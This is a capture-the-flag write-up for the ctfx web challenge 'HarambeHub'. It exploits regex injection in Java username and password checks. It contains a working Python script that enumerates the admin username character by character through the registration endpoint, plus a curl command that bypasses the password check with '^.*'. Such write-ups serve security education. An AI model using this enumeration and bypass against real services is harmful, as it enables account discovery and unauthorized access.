ctfx [Web] - HarambeHub [100pts]

Web java, regex, web Comments

This site was created in honor of harambe: http://problems.ctfx.io:7003/
Problem author: omegablitz
HarambeHub.java
User.java

Two java files are given, analyzing both we can see that on the first file there is an “if condition” that is using string.match for username to check if it exists, knowning this we can get the admin username character by character with a python script by regex injecting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

import requests
import string
#for x in "abcdefghijklmnopqrstuvxwyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789":
username = ''
lower_alpha = '[a-z]'
upper_alpha = '[A-Z]'
digits = '[0-9]'
special = '[^\w]'
regex_string = ''
d = {lower_alpha : string.ascii_lowercase, upper_alpha : string.ascii_uppercase, digits: string.digits, special: string.punctuation + string.whitespace}
regex = [lower_alpha, upper_alpha, digits, special]
char_found = True
regex_found = True
while regex_found:
    regex_found = False
    for r in regex:
        while True:
            a = requests.post('http://problems.ctfx.io:7003/users', data={'username': '^%s.*' % (regex_string+r), 'password': 'a', 'realname': 'a'})
            if (a.status_code != 200):
                #print a.text, r
                continue
            if ("FAILED: User with that name already exists!" in a.text):
                regex_found = True
                char_found = True
                regex_string += r
                for x in d[r]:
                    char_found = False
                    while True:
                        if (x in '\.[]{}()*+-?^$|'):
                            x = '\\' + x
                        a = requests.post('http://problems.ctfx.io:7003/users', data={'username': '^(%s).*' % (username+x), 'password': 'a', 'realname': 'a'})
                        if (a.status_code != 200):
                            #print a.text, x
                            continue
                        # print a.text, x
                        if ("FAILED: User with that name already exists!" in a.text):
                            username += x
                            char_found = True
                            print "The username: " + username
                        break
                    if char_found:
                        break
            break
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

kinyabitch@Debian ~/h/c/c/web2> python a.py
The username: \[
The username: \[A
The username: \[Ad
The username: \[Adm
The username: \[Admi
The username: \[Admin
The username: \[Admin\]
The username: \[Admin\] 
The username: \[Admin\] A
The username: \[Admin\] Ar
The username: \[Admin\] Arx
The username: \[Admin\] Arxe
The username: \[Admin\] Arxen
The username: \[Admin\] Arxeni
The username: \[Admin\] Arxenix
The username: \[Admin\] Arxenixi
The username: \[Admin\] Arxenixis
The username: \[Admin\] Arxenixisa
The username: \[Admin\] Arxenixisal
The username: \[Admin\] Arxenixisalo
The username: \[Admin\] Arxenixisalos
The username: \[Admin\] Arxenixisalose
The username: \[Admin\] Arxenixisaloser

One the second one we can see that is doing same thing but now with the password, so now we have the admin username we can just inject this regex “^*.” on the password and get the flag :)

1
2
3

kinyabitch@Debian /v/w/html> curl 'http://problems.ctfx.io:7003/name?username=\[Admin\]%20Arxenixisaloser&password=^.*'
ctf(h4r4mb3_d1dn1t_d13_4_th1s_f33ls_b4d)

TeamRocketISTCTF Team

Portuguese Computer Science Students